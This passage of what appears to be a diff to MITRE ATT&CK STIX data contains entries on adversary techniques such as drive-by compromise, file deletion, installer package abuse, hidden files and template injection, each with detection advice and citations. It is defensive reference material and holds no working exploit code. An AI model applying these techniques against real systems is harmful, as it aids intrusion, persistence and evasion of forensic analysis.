"phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d614a9cf-18eb-4800-81e4-ab8ddf0baa73", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0818", + "external_id": "T0818" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "File Deletion", + "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Walker Johnson" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "created": "2020-01-31T12:35:36.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/004", + "external_id": "T1070.004" + }, + { + "source_name": "Microsoft SDelete July 2016", + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:11.730Z", + "name": "Connection Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.\n\nThe definition of a proxy can also be expanded to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.\n\nThe network may be within a single organization or across multiple organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. (Citation: Enterprise ATT&CK January 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0884", + "external_id": "T0884" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Connection Proxy Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1090" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "SaaS" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1189", + "external_id": "T1189" + }, + { + "source_name": "Shadowserver Strategic Web Compromise", + "description": "Adair, S., Moran, N. (2012, May 15). Cyber Espionage & Strategic Web Compromises – Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.", + "url": "http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/" + }, + { + "source_name": "Volexity OceanLotus Nov 2017", + "description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.", + "url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Network Denial of Service", + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee" + ], + "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "created": "2019-04-17T20:23:15.105Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1498", + "external_id": "T1498" + }, + { + "source_name": "FireEye OpPoisonedHandover February 2016", + "description": "Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" + }, + { + "source_name": "FSISAC FraudNetDoS September 2012", + "description": "FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.", + "url": "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf" + }, + { + "source_name": "Symantec DDoS October 2014", + "description": "Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T03:27:48.171Z", + "name": "Cloud Administration Command", + "description": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Cisco", + "Nichols Jasper", + "Jared Wilson", + "Caio Silva", + "Adrien Bataille", + "Anders Vejlby", + "Nader Zaveri", + "Tamir Yehuda" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7", + "created": "2023-03-13T15:26:11.741Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1651", + "external_id": "T1651" + }, + { + "source_name": "AWS Systems Manager Run Command", + "description": "AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.", + "url": "https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html" + }, + { + "source_name": "MSTIC Nobelium Oct 2021", + "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.", + "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/" + }, + { + "source_name": "Microsoft Run Command", + "description": "Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:52:44.332Z", + "name": "Installer Packages", + "description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Brandon Dalton @PartyD0lphin", + "Rodchenko Aleksandr" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "created": "2022-09-27T18:02:16.026Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/016", + "external_id": "T1546.016" + }, + { + "source_name": "Application Bundle Manipulation Brandon Dalton", + "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.", + "url": "https://redcanary.com/blog/mac-application-bundles/" + }, + { + "source_name": "Debian Manual Maintainer Scripts", + "description": "Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.", + "url": "https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact" + }, + { + "source_name": "Windows AppleJeus GReAT", + "description": "Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.", + "url": "https://securelist.com/operation-applejeus/87553/" + }, + { + "source_name": "Microsoft Installation Procedures", + "description": "Microsoft. (2021, January 7). Installation Procedure Tables Group. Retrieved December 27, 2023.", + "url": "https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group" + }, + { + "source_name": "wardle evilquest parti", + "description": "Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.", + "url": "https://objective-see.com/blog/blog_0x59.html" + }, + { + "source_name": "Installer Package Scripting Rich Trouton", + "description": "Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.", + "url": "https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Scanning IP Blocks", + "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "created": "2020-10-02T16:54:23.193Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1595/001", + "external_id": "T1595.001" + }, + { + "source_name": "Botnet Scan", + "description": "Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.", + "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Hidden Files and Directories", + "description": "To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.\n\n### Windows\n\nUsers can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.\n\n### Linux/Mac\n\nUsers can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: defaults write com.apple.finder AppleShowAllFiles YES, and then relaunch the Finder Application.\n\n### Mac\n\nFiles on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).\nMany applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1158", + "external_id": "T1158" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Template Injection", + "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Michael Raggi @aRtAGGI", + "Brian Wiltse @evalstrings", + "Patrick Campbell, @pjcampbe11" + ], + "x_mitre_detection": "Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.\n\nMonitor .rtf files for strings indicating the *\\template control word has been modified to retrieve a URL resource, such as *\\template http or *\\template \\u-.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + 